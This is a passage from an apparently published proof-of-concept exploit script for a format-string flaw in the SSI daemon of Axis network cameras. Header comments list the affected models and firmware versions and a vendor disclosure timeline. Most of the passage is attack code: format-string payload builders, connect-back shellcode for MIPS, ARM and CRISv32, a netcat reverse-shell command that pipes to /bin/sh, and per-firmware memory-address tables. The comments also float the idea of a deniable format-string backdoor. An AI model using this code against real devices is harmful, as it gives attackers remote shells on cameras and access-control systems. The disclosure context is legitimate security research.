pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics.\r\n#\r\n# Quite surprised to see so many different devices and under one major release version,\r\n# that's covered by one \"FMS key\". The \"FMS key\" are valid for all minor versions under the major version.\r\n#\r\n# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor, \r\n# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password. \r\n#\r\n# - No hardcoded login/password that could easily be found in firmware/software files. \r\n# - Extremely hard to find without local access (and find out what to trigger for opening the door)\r\n# - Nobody can not actually prove it is a sophisticated door for sure. \"It's just another bug.. sorry! - here is the fixed version.\"\r\n# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find)\r\n#\r\n# Note:\r\n# I don't say that Axis Communication has made this hidden format string by this purpose.\r\n# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon, \r\n# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr().\r\n#\r\n# Vulnerable and exploitable products\r\n#\r\n# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006,\r\n# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364,\r\n# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215,\r\n# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384,\r\n# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624,\r\n# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E,\r\n# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT,\r\n# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045,\r\n# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E,\r\n# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203,\r\n# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E,\r\n# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E,\r\n# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C,\r\n# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W,\r\n# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L,\r\n# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more\r\n#\r\n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt\r\n#\r\n# Firmware versions vulnerable to the SSI FMS exploit\r\n#\r\n# ('V.Vx' == The FMS key used in this exploit)\r\n#\r\n# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x)\r\n# 5.00.x 2008 - - no\r\n# 5.01.x 2008 no - no\r\n# 5.02.x 2008 no - -\r\n# 5.05.x 2009 no - -\r\n# 5.06.x 2009 no - -\r\n# 5.07.x 2009 no - no\r\n# 5.08.x 2010 no - -\r\n# 5.09.x 2010 no - -\r\n# 5.10.x 2009 no - -\r\n# 5.11.x 2010 no - -\r\n# 5.12.x 2010 no - -\r\n# 5.15.x 2010 no - -\r\n# 5.16.x 2010 no - -\r\n# 5.20.x 2010-2011 5.2x - 5.2x\r\n# 5.21.x 2011 5.2x - 5.2x\r\n# 5.22.x 2011 5.2x - -\r\n# 5.25.x 2011 5.2x - -\r\n# 5.40.x 2011 5.4x 5.4x 5.4x\r\n# 5.41.x 2012 5.4x - -\r\n# 5.50.x 2013 5.5x 5.5x 5.4x\r\n# 5.51.x 2013 - 5.4x -\r\n# 5.55.x 2013 - 5.5x 5.5x\r\n# 5.60.x 2014 - 5.6x 5.6x\r\n# 5.65.x 2014-2015 - 5.6x -\r\n# 5.70.x 2015 - 5.7x -\r\n# 5.75.x 2015 - 5.7x 5.7x\r\n# 5.80.x 2015 - 5.8x 5.8x\r\n# 5.81.x 2015 - 5.8x -\r\n# 5.85.x 2015 - 5.8x 5.8x\r\n# 5.90.x 2015 - 5.9x -\r\n# 5.95.x 2016 - 5.9x 5.8x\r\n# 6.10.x 2016 - 6.1x -\r\n# 6.15.x 2016 - - 6.1x\r\n# 6.20.x 2016 - 6.2x -\r\n#\r\n# Vendor URL's of still supported and affected products\r\n#\r\n# http://www.axis.com/global/en/products/access-control\r\n# http://www.axis.com/global/en/products/video-encoders\r\n# http://www.axis.com/global/en/products/network-cameras\r\n# http://www.axis.com/global/en/products/audio\r\n#\r\n# Axis Product Security\r\n#\r\n# [email\u00a0protected]\r\n# http://www.axis.com/global/en/support/product-security\r\n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt\r\n# http://www.axis.com/global/en/support/faq/FAQ116268\r\n#\r\n# Timetable\r\n#\r\n# - Research and Development: 06/01/2016 - 01/06/2016\r\n# - Sent vulnerability details to vendor: 05/06/2016\r\n# - Vendor responce received: 06/06/2016\r\n# - Vendor ACK of findings received: 07/06/2016\r\n# - Vendor sent verification image: 13/06/2016\r\n# - Confirmed that exploit do not work after vendors correction: 13/06/2016\r\n# - Vendor informed about their service release(s): 29/06/2016\r\n# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016\r\n# - Full Disclosure: 18/07/2016\r\n#\r\n# Quote of the day: Never say \"whoops! :o\", always say \"Ah, still interesting! :>\"\r\n#\r\n# Have a nice day\r\n# /bashis\r\n#\r\n#####################################################################################\r\n \r\nimport sys\r\nimport string\r\nimport socket\r\nimport time\r\nimport argparse\r\nimport urllib, urllib2, httplib\r\nimport base64\r\nimport ssl\r\nimport re\r\n \r\n \r\nclass do_FMS:\r\n \r\n# POP = \"%8x\" # Old style POP's with 8 bytes per POP\r\n POP = \"%1c\" # Old style POP's with 1 byte per POP\r\n WRITElln = \"%lln\" # Write 8 bytes\r\n WRITEn = \"%n\" # Write 4 bytes\r\n WRITEhn = \"%hn\" # Write 2 bytes\r\n WRITEhhn = \"%hhn\" # Write 1 byte\r\n \r\n def __init__(self,targetIP,verbose):\r\n self.targetIP = targetIP\r\n self.verbose = verbose\r\n self.fmscode = \"\"\r\n \r\n # Mostly used internally in this function\r\n def Add(self, data):\r\n self.fmscode += data\r\n \r\n # 'New Style' Double word (8 bytes)\r\n def AddDirectParameterLLN(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('$lln')\r\n \r\n # 'New Style' Word (4 bytes)\r\n def AddDirectParameterN(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('$n')\r\n \r\n # 'New Style' Half word (2 bytes)\r\n def AddDirectParameterHN(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('$hn')\r\n \r\n # 'New Style' One Byte (1 byte)\r\n def AddDirectParameterHHN(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('$hhn')\r\n \r\n # Addressing\r\n def AddADDR(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('u')\r\n \r\n # 'Old Style' POP\r\n def AddPOP(self, size):\r\n if size != 0:\r\n self.Add(self.POP * size)\r\n \r\n # Normally only one will be sent, multiple is good to quick-check for any FMS\r\n #\r\n # 'Old Style' Double word (8 bytes)\r\n def AddWRITElln(self, size):\r\n self.Add(self.WRITElln * size)\r\n \r\n # 'Old Style' Word (4 bytes)\r\n def AddWRITEn(self, size):\r\n self.Add(self.WRITEn * size)\r\n \r\n # 'Old Style' Half word (2 bytes)\r\n def AddWRITEhn(self, size):\r\n self.Add(self.WRITEhn * size)\r\n \r\n # 'Old Style' One byte (1 byte)\r\n def AddWRITEhhn(self, size):\r\n self.Add(self.WRITEhhn * size)\r\n \r\n # Return the whole FMS string\r\n def FMSbuild(self):\r\n return self.fmscode\r\n \r\nclass HTTPconnect:\r\n \r\n def __init__(self, host, proto, verbose, creds, noexploit):\r\n self.host = host\r\n self.proto = proto\r\n self.verbose = verbose\r\n self.credentials = creds\r\n self.noexploit = noexploit\r\n \r\n # Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\\t','$','`' etc..\r\n def RAW(self, uri):\r\n # Connect-timeout in seconds\r\n timeout = 5\r\n socket.setdefaulttimeout(timeout)\r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n tmp = self.host.split(':')\r\n HOST = tmp[0]\r\n PORT = int(tmp[1])\r\n if self.verbose:\r\n print \"[Verbose] Sending to:\", HOST\r\n print \"[Verbose] Port:\", PORT\r\n print \"[Verbose] URI:\",uri\r\n s.connect((HOST, PORT))\r\n s.send(\"GET %s HTTP/1.0\\r\\n\\r\\n\" % uri)\r\n html = (s.recv(4096)) # We really do not care whats coming back\r\n# if html:\r\n# print \"[i] Received:\",html\r\n s.shutdown(3)\r\n s.close()\r\n return html\r\n \r\n \r\n def Send(self, uri):\r\n \r\n # The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually\r\n # matter for the functionality of this exploit, only for future references.\r\n headers = { \r\n 'User-Agent' : 'MSIE',\r\n }\r\n \r\n # Connect-timeout in seconds\r\n timeout = 5\r\n socket.setdefaulttimeout(timeout)\r\n \r\n url = '%s://%s%s' % (self.proto, self.host, uri)\r\n \r\n if self.verbose:\r\n print \"[Verbose] Sending:\", url\r\n \r\n if self.proto == 'https':\r\n if hasattr(ssl, '_create_unverified_context'):\r\n print \"[i] Creating SSL Default Context\"\r\n ssl._create_default_https_context = ssl._create_unverified_context\r\n \r\n if self.credentials:\r\n Basic_Auth = self.credentials.split(':')\r\n if self.verbose:\r\n print \"[Verbose] User:\",Basic_Auth[0],\"Password:\",Basic_Auth[1]\r\n try:\r\n pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()\r\n pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])\r\n auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)\r\n opener = urllib2.build_opener(auth_handler)\r\n urllib2.install_opener(opener)\r\n except Exception as e:\r\n print \"[!] Basic Auth Error:\",e\r\n sys.exit(1)\r\n \r\n if self.noexploit and not self.verbose:\r\n print \"[<] 204 Not Sending!\"\r\n html = \"Not sending any data\"\r\n else:\r\n data = None\r\n req = urllib2.Request(url, data, headers)\r\n rsp = urllib2.urlopen(req)\r\n if rsp:\r\n print \"[<] %s OK\" % rsp.code\r\n html = rsp.read()\r\n return html\r\n \r\n \r\nclass shellcode_db:\r\n \r\n def __init__(self,targetIP,verbose):\r\n self.targetIP = targetIP\r\n self.verbose = verbose\r\n \r\n def sc(self,target):\r\n self.target = target\r\n \r\n \r\n# Connect back shellcode\r\n#\r\n# CRISv32: Written by myself, no shellcode availible out on \"The Internet\"\r\n# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators\r\n# MIPSel: Written by Jacob Holcomb (url encoded by me)\r\n# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php\r\n#\r\n # Slightly modified syscall's\r\n MIPSel = string.join([\r\n #close stdin\r\n \"%ff%ff%04%28\" #slti a0,zero,-1\r\n \"%a6%0f%02%24\" #li v0,4006\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #close stdout\r\n \"%11%11%04%28\" #slti a0,zero,4369\r\n \"%a6%0f%02%24\" #li v0,4006\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #close stderr\r\n \"%fd%ff%0c%24\" #li t4,-3\r\n \"%27%20%80%01\" #nor a0,t4,zero\r\n \"%a6%0f%02%24\" #li v0,4006\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n # socket AF_INET (2)\r\n \"%fd%ff%0c%24\" #li t4,-3\r\n \"%27%20%80%01\" #nor a0,t4,zero\r\n \"%27%28%80%01\" #nor a1,t4,zero\r\n \"%ff%ff%06%28\" #slti a2,zero,-1\r\n \"%57%10%02%24\" #li v0,4183\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #\r\n \"%ff%ff%44%30\" # andi $a0, $v0, 0xFFFF\r\n #\r\n # dup2 stdout\r\n \"%c9%0f%02%24\" #li v0,4041\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #\r\n # dup2 stderr\r\n \"%c9%0f%02%24\" #li v0,4041\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #\r\n # Port\r\n \"PP1PP0%05%3c\"\r\n \"%01%ff%a5%34\"\r\n #\r\n \"%01%01%a5%20\" #addi a1,a1,257\r\n \"%f8%ff%a5%af\" #sw a1,-8(sp)\r\n #\r\n # IP\r\n \"IP3IP4%05%3c\"\r\n \"IP1IP2%a5%34\"\r\n #\r\n \"%fc%ff%a5%af\" #sw a1,-4(sp)\r\n \"%f8%ff%a5%23\" #addi a1,sp,-8\r\n \"%ef%ff%0c%24\" #li t4,-17\r\n \"%27%30%80%01\" #nor a2,t4,zero\r\n \"%4a%10%02%24\" #li v0,4170\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #\r\n \"%62%69%08%3c\" #lui t0,0x6962\r\n \"%2f%2f%08%35\" #ori t0,t0,0x2f2f\r\n \"%ec%ff%a8%af\" #sw t0,-20(sp)\r\n \"%73%68%08%3c\" #lui t0,0x6873\r\n \"%6e%2f%08%35\" #ori t0,t0,0x2f6e\r\n \"%f0%ff%a8%af\" #sw t0,-16(sp\r\n \"%ff%ff%07%28\" #slti a3,zero,-1\r\n \"%f4%ff%a7%af\" #sw a3,-12(sp)\r\n \"%fc%ff%a7%af\" #sw a3,-4(sp\r\n \"%ec%ff%a4%23\" #addi a0,sp,-20\r\n \"%ec%ff%a8%23\" #addi t0,sp,-20\r\n \"%f8%ff%a8%af\" #sw t0,-8(sp)\r\n \"%f8%ff%a5%23\" #addi a1,sp,-8\r\n \"%ec%ff%bd%27\" #addiu sp,sp,-20\r\n \"%ff%ff%06%28\" #slti a2,zero,-1\r\n \"%ab%0f%02%24\" #li v0,4011 (execve)\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n ], '') \r\n \r\n # Working netcat shell\r\n # - $PATH will locate 'mkfifo', 'nc' and 'rm'\r\n # - LHOST / LPORT will be changed on the fly later in the code\r\n # - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting\r\n # - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator]\r\n # $ echo -n \"$IFS\" | hexdump -C\r\n # 00000000 20 09 0a\r\n # - $PS1 = $ [By default, and we need something to \"comment\" out our trailing FMS code from /bin/sh -c]\r\n #\r\n # '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator\r\n #\r\n # Working with Apache and Boa\r\n# NCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s\\\"$IFS\\\"2>/tmp/s;rm$IFS/tmp/s;$PS1\"\r\n NCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1\"\r\n \r\n ARMel = string.join([\r\n # original: http://shell-storm.org/shellcode/files/shellcode-754.php\r\n # 32-bit instructions, enter thumb mode\r\n \"%01%10%8f%e2\" # add r1, pc, #1\r\n \"%11%ff%2f%e1\" # bx r1\r\n \r\n # 16-bit thumb instructions follow\r\n #\r\n # socket(2, 1, 0)\r\n \"%02%20\" #mov r0, #2\r\n \"%01%21\" #mov r1, #1\r\n \"%92%1a\" #sub r2, r2, r2\r\n \"%0f%02\" #lsl r7, r1, #8\r\n \"%19%37\" #add r7, r7, #25\r\n \"%01%df\" #svc 1\r\n #\r\n # connect(r0, &addr, 16)\r\n \"%06%1c\" #mov r6, r0\r\n \"%08%a1\" #add r1, pc, #32\r\n \"%10%22\" #mov r2, #16\r\n \"%02%37\" #add r7, #2\r\n \"%01%df\" #svc 1\r\n #\r\n # dup2(r0, 0/1/2)\r\n \"%3f%27\" #mov r7, #63\r\n \"%02%21\" #mov r1, #2\r\n #\r\n #lb:\r\n \"%30%1c\" #mov r0, r6\r\n \"%01%df\" #svc 1\r\n \"%01%39\" #sub r1, #1\r\n \"%fb%d5\" #bpl lb\r\n #\r\n # execve(\"/bin/sh\", [\"/bin/sh\", 0], 0)\r\n \"%05%a0\" #add r0, pc, #20\r\n \"%92%1a\" #sub r2, r2, r2\r\n \"%05%b4\" #push {r0, r2}\r\n \"%69%46\" #mov r1, sp\r\n \"%0b%27\" #mov r7, #11\r\n \"%01%df\" #svc 1\r\n #\r\n \"%c0%46\" # .align 2 (NOP)\r\n \"%02%00\" # .short 0x2 (struct sockaddr)\r\n \"PP1PP0\" # .short 0x3412 (port: 0x1234)\r\n \"IP1IP2IP3IP4\" #.byte 192,168,57,1 (ip: 192.168.57.1)\r\n # .ascii \"/bin/sh\\0\\0\"\r\n \"%2f%62%69%6e\" # /bin\r\n \"%2f%73%68%00%00\" # /sh\\x00\\x00\r\n \"%00%00%00%00\"\r\n \"%c0%46\"\r\n ], '') \r\n \r\n \r\n # Connect-back shell for Axis CRISv32\r\n # Written by mcw noemail eu 2016\r\n #\r\n CRISv32 = string.join([\r\n #close(0)\r\n \"%7a%86\" # clear.d r10 \r\n \"%5f%9c%06%00\" # movu.w 0x6,r9\r\n \"%3d%e9\" # break 13\r\n #close(1)\r\n \"%41%a2\" # moveq 1,r10\r\n \"%5f%9c%06%00\" # movu.w 0x6,r9\r\n \"%3d%e9\" # break 13\r\n #close(2)\r\n \"%42%a2\" # moveq 2,r10\r\n \"%5f%9c%06%00\" # movu.w 0x6,r9\r\n \"%3d%e9\" # break 13\r\n #\r\n \"%10%e1\" # addoq 16,sp,acr\r\n \"%42%92\" # moveq 2,r9\r\n \"%df%9b\" # move.w r9,[acr]\r\n \"%10%e1\" # addoq 16,sp,acr\r\n \"%02%f2\" # addq 2,acr\r\n #PORT\r\n \"%5f%9ePP1PP0\" # move.w 0xPP1PP0,r9 #\r\n \"%df%9b\" # move.w r9,[acr]\r\n \"%10%e1\" # addoq 16,sp,acr\r\n \"%6f%96\" # move.d acr,r9\r\n \"%04%92\" # addq 4,r9\r\n #IP\r\n \"%6f%feIP1IP2IP3IP4\" # move.d IP4IP3IP2IP1,acr\r\n \"%e9%fb\" # move.d acr,[r9]\r\n #\r\n #socket()\r\n \"%42%a2\" # moveq 2,r10\r\n \"%41%b2\" # moveq 1,r11\r\n \"%7c%86\" # clear.d r12\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%e9%af\" # move.d $r10,[$r9+]\r\n \"%e9%bf\" # move.d $r11,[$r9+]\r\n \"%e9%cf\" # move.d $r12,[$r9+]\r\n \"%41%a2\" # moveq 1,$r10\r\n \"%6e%b6\" # move.d $sp,$r11\r\n \"%5f%9c%66%00\" # movu.w 0x66,$r9\r\n \"%3d%e9\" # break 13\r\n #\r\n \"%6a%96\" # move.d $r10,$r9\r\n \"%0c%e1\" # addoq 12,$sp,$acr\r\n \"%ef%9b\" # move.d $r9,[$acr]\r\n \"%0c%e1\" # addoq 12,$sp,$acr\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%10%92\" # addq 16,$r9\r\n \"%6f%aa\" # move.d [$acr],$r10\r\n \"%69%b6\" # move.d $r9,$r11\r\n \"%50%c2\" # moveq 16,$r12\r\n #\r\n # connect()\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%e9%af\" # move.d $r10,[$r9+]\r\n \"%e9%bf\" # move.d $r11,[$r9+]\r\n \"%e9%cf\" # move.d $r12,[$r9+]\r\n \"%43%a2\" # moveq 3,$r10\r\n \"%6e%b6\" # move.d $sp,$r11\r\n \"%5f%9c%66%00\" # movu.w 0x66,$r9 \r\n \"%3d%e9\" # break 13\r\n # dup(0) already in socket\r\n #dup(1)\r\n \"%6f%aa\" # move.d [$acr],$r10\r\n \"%41%b2\" # moveq 1,$r11\r\n \"%5f%9c%3f%00\" # movu.w 0x3f,$r9\r\n \"%3d%e9\" # break 13\r\n #\r\n #dup(2)\r\n \"%6f%aa\" # move.d [$acr],$r10\r\n \"%42%b2\" # moveq 2,$r11\r\n \"%5f%9c%3f%00\" # movu.w 0x3f,$r9\r\n \"%3d%e9\" # break 13\r\n #\r\n #execve(\"/bin/sh\",NULL,NULL)\r\n \"%90%e2\" # subq 16,$sp\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%6e%a6\" # move.d $sp,$10\r\n \"%6f%0e%2f%2f%62%69\" # move.d 69622f2f,$r0\r\n \"%e9%0b\" # move.d $r0,[$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%6f%0e%6e%2f%73%68\" # move.d 68732f6e,$r0\r\n \"%e9%0b\" # move.d $r0,[$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%79%8a\" # clear.d [$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%79%8a\" # clear.d [$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%e9%ab\" # move.d $r10,[$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%79%8a\" # clear.d [$r9]\r\n \"%10%e2\" # addq 16,$sp\r\n \"%6e%f6\" # move.d $sp,$acr\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%6e%b6\" # move.d $sp,$r11\r\n \"%7c%86\" # clear.d $r12\r\n \"%4b%92\" # moveq 11,$r9\r\n \"%3d%e9\" # break 13\r\n ], '') \r\n \r\n \r\n if self.target == 'MIPSel':\r\n return MIPSel\r\n elif self.target == 'ARMel':\r\n return ARMel\r\n elif self.target == 'CRISv32':\r\n return CRISv32\r\n elif self.target == 'NCSH1':\r\n return NCSH\r\n elif self.target == 'NCSH2':\r\n return NCSH\r\n else:\r\n print \"[!] Unknown shellcode! (%s)\" % str(self.target)\r\n sys.exit(1)\r\n \r\n \r\nclass FMSdb:\r\n \r\n def __init__(self,targetIP,verbose):\r\n self.targetIP = targetIP\r\n self.verbose = verbose\r\n \r\n def FMSkey(self,target):\r\n self.target = target\r\n \r\n target_db = {\r\n \r\n#-----------------------------------------------------------------------\r\n# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH)\r\n#-----------------------------------------------------------------------\r\n \r\n#\r\n# Using POP format string, AKA 'Old Style'\r\n#\r\n # MPQT\r\n 'MIPS-5.85.x': [\r\n 0x41f370, # Adjust to GOT free() address\r\n 0x420900, # .bss shellcode address\r\n 2, # 1st POP's\r\n 2, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.40.3': [\r\n 0x41e41c, # Adjust to GOT free() address\r\n 0x4208cc, # .bss shellcode address\r\n 7, # 1st POP's\r\n 11, # 2nd POP's\r\n 'ax', # Aligns injected code\r\n 450, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.4x': [ \r\n 0x41e4cc, # Adjust to GOT free() address\r\n 0x42097c, # .bss shellcode address\r\n 7, # 1st POP's\r\n 11, # 2nd POP's\r\n 'ax', # Aligns injected code\r\n 450, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.5x': [\r\n 0x41d11c, # Adjust to GOT free() address\r\n 0x41f728, # .bss shellcode address\r\n 5, # 1st POP's\r\n 15, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.55x': [ \r\n 0x41d11c, # Adjust to GOT free() address\r\n 0x41f728, # .bss shellcode address\r\n 11, # 1st POP's\r\n 9, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # Shared with MPQT and PACS\r\n 'MIPS-5.6x': [ \r\n 0x41d048, # Adjust to GOT free() address\r\n 0x41f728, # .bss shellcode address\r\n 5, # 1st POP's\r\n 15, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n \r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.7x': [ \r\n 0x41d04c, # Adjust to GOT free() address\r\n 0x41f718, # .bss shellcode address\r\n 2, # 1st POP's\r\n 14, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.75x': [\r\n 0x41c498, # Adjust to GOT free() address\r\n 0x41daf0, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # Shared with MPQT and PACS\r\n 'MIPS-5.8x': [\r\n 0x41d0c0, # Adjust to GOT free() address\r\n 0x41e740, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.9x': [ \r\n 0x41d0c0, # Adjust to GOT free() address\r\n 0x41e750, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-6.1x': [\r\n 0x41c480, # Adjust to GOT free() address\r\n 0x41dac0, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-6.2x': [\r\n 0x41e578, # Adjust to GOT free() address\r\n 0x41fae0, # .bss shellcode address\r\n 2, # 1st POP's\r\n 2, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-6.20x': [\r\n 0x41d0c4, # Adjust to GOT free() address\r\n 0x41e700, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # PACS\r\n 'MIPS-1.3x': [\r\n 0x41e4cc, # Adjust to GOT free() address\r\n 0x420a78, # .bss shellcode address\r\n 7, # 1st POP's\r\n 11, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # PACS\r\n 'MIPS-1.1x': [\r\n 0x41e268, # Adjust to GOT free() address\r\n 0x420818, # .bss shellcode address\r\n 7, # 1st POP's\r\n 11, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n#\r\n# Tested with execstack to set executable stack flag bit on bin's and lib's\r\n#\r\n# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working.\r\n#\r\n \r\n # ARMel with bin/libs executable stack flag set with 'execstack'\r\n # MPQT\r\n 'ARM-5.50x': [ # \r\n 0x1c1b4, # Adjust to GOT free() address\r\n 0x1e7c8, # .bss shellcode address\r\n 93, # 1st POP's\r\n 1, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'ARMel' # Shellcode type (ARMel)\r\n ],\r\n \r\n # ARMel with bin/libs executable stack flag set with 'execstack'\r\n # MPQT\r\n 'ARM-5.55x': [ # \r\n 0x1c15c, # Adjust to GOT free() address\r\n 0x1e834, # .bss shellcode address\r\n 59, # 1st POP's\r\n 80, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 800, # How big buffer before shellcode\r\n 'ARMel' # Shellcode type (ARMel)\r\n ],\r\n \r\n#\r\n# Using direct parameter access format string, AKA 'New Style'\r\n#\r\n # MPQT\r\n 'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root)\r\n 0x1c1b4, # Adjust to GOT free() address\r\n 0x10178, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 61, # 1st POP's\r\n 115, # 2nd POP's\r\n 143, # 3rd POP's\r\n 118, # 4th POP's\r\n 'NCSH2' # Shellcode type (Netcat Shell)\r\n ],\r\n 